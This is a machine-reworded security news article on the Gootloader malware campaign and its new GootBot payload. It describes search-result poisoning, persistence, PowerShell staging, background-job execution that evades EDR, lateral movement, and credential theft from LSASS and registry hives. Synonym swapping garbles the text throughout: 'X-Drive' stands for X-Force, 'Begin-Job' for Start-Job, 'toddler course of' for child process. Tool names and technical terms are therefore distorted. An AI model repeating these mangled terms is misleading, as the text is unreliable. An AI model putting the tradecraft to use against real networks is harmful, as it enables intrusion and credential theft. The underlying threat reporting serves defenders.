Gootloader itself is written in JavaScript and is distributed via black hat SEO (BHSEO) campaigns that contain utilizing compromised web sites to inject rogue outcomes into serps. Gootloader search outcome poisoning campaigns sometimes goal key phrases for enterprise paperwork particular to completely different industries.
“Hive0127 sometimes targets on-line searches for contracts, authorized varieties or different business-related paperwork; for instance: ‘Is a closing assertion the identical as a grand contract?’,” researchers from X-Drive clarify. “Targets are served a compromised web site modified to look as a official discussion board on the prime of the poisoned search engine outcomes web page. Inside the discussion board dialog, the targets are then tricked into downloading an archive file associated to their preliminary search phrases, however which truly accommodates Gootloader.”
From Gootloader to GootBot
Upon execution, Gootloader drops a malicious JavaScript file in an current folder from the %APPDATA% listing and units up a scheduled job to make sure its persistent execution at restart. The JavaScript file then executes a PowerShell script that collects primary details about the system and uploads it to 10 hard-coded URLs — normally compromised WordPress web sites. The script additionally searches in a loop for extra PowerShell payloads to obtain and execute from these servers.
In previous campaigns, that is the stage the place attackers deployed Cobalt Strike or different extra superior payloads. Nevertheless, the X-Drive researchers lately noticed a brand new payload within the type of an obfuscated PowerShell script that reaches out to a single C2 server and waits for extra duties to execute. They named this payload GootBot because it’s a extra light-weight variant of Gootloader itself.
“As a response, GootBot expects a string consisting of a Base64-encoded payload, and the final eight characters being the duty identify,” the researchers stated. “It then decodes the payload and injects it right into a easy scriptblock earlier than executing it in a brand new background job utilizing the ‘Begin-Job’ Cmdlet. This permits the PowerShell payload to be run asynchronously and with out creating a toddler course of, doubtlessly leading to much less EDR detections.”
What makes GootBot completely different is that it’s not solely deployed on the system the place Gootloader was first executed, but in addition to different methods from the identical community. The payloads that GootBot receives are PowerShell scripts used for lateral motion that enumerate community methods and the area and exfiltrate credentials by dumping the reminiscence of the LSASS course of, in addition to registry hives akin to SAM, SYSTEM, and SECURITY.
